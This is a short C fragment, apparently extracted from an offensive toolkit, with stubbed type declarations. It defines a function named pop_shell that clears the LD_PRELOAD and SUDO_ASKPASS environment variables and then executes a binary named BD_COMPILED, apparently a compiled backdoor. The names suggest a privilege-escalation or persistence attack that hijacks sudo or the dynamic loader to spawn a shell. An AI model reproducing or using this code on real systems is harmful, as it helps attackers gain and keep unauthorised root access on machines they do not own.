
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;
 char* BD_COMPILED ;
 int environ ;
 int execve (char*,char**,int ) ;
 int unsetenv (char*) ;

void *pop_shell(){

    unsetenv("LD_PRELOAD");
    unsetenv("SUDO_ASKPASS");
    char *exploit_args[] = { BD_COMPILED, ((void*)0) };
    execve(BD_COMPILED, exploit_args, environ);
}
